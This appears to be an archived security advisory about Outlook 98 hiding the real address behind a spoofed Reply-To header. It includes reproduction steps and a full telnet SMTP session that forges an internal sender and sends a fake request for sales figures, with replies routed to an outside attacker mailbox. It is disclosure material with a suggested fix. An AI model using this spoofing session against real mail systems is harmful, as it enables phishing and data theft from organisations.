COMMAND

    Outlook

SYSTEMS AFFECTED

    Outlook 98

PROBLEM

    Nate Lawson  found following.   Outlook uses  a sender's  Reply-To
    address silently, allowing a user to inadvertently send data to an
    Internet  mail  account  when  intending  to reply to an internal,
    trusted user.  Anyone on the Internet can spoof a trusted internal
    Exchange user and  get replies sent  back to themself  without the
    user knowing  they weren't  responding to  another internal  user.
    How to reproduce:

    1. Spoof mail as an internal user with a Reply-To address claiming
       to be an internal user, but an address of an Internet  account,
       say hotmail.
    2. Go into Outlook and read the mail.  The mail looks like it  was
       internally  generated  but  viewing  the  full Internet headers
       under View->Options shows the bogus Reply-To header.
    3. Hit Reply in Outlook.   The To: field looks like it's  going to
       a valid internal  user, but right  clicking on it  and choosing
       Properties shows that the internal user it is sending the reply
       to is actually an Internet address.
    4. Enter some text  and hit Send.   Observe that the mail  went to
       the attacker's account, not the internal one.

    A quick script:

        {root 5:00pm} ~> telnet mail.example.com 25
        Trying 10.20.2.5...
        Connected to mail.example.com.
        Escape character is '^]'.
        220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
        helo losebag
        250 OK
        mail from:<>
        250 OK - mail from <>
        rcpt to:<accounting@example.com>
        250 OK - Recipient <accounting@example.com>
        data
        354 Send data.  End with CRLF.CRLF
        From: Nate Lawson
        To: Accounting
        Reply-To: Nate Lawson<intruder@hotmail.com>
        Subject: important!

        Please reply with the latest copy of our sales figures!

        Thanks,
        Nate
        .
        250 OK
        quit
        221 closing connection
        Connection closed by foreign host.

    Now, a  reply to  the email  will go  not to  the trusted internal
    user  Nate  Lawson  <nlawson@example.com>  but  to  the  attacker,
    <intruder@hotmail.com>.  Worse, the  user sees no indication  that
    the mail  is outward-bound!   The To:  field on  the reply  simply
    shows "Nate Lawson", a valid internal user.  The problem seems  to
    be that Outlook (in the  default setup) hides the address  part of
    the reply-to header when  using it to create  the value to put  in
    the "To" box of  the reply.  The  other mail readers tested  it on
    (Hotmail and  Netscape Messenger)  showed the  reply-to header  in
    full.

SOLUTION

    Suggested Fix: always show the full email address of any recipient
    that is not local  (i.e. username@example.com would be  hidden but
    any instance of user@hotmail.com  would be shown).   Microsoft has
    been notified, but claimed this  was a weakness in SMTP  and would
    not be  fixed until  a secure  successor to  SMTP is  implemented.
    They obviouly missed the  point -- the error  is not in that  mail
    can be  forged, but  that Outlook  allows a  user to  respond to a
    message that looks local and legitimate, but is actually  destined
    for an outside address.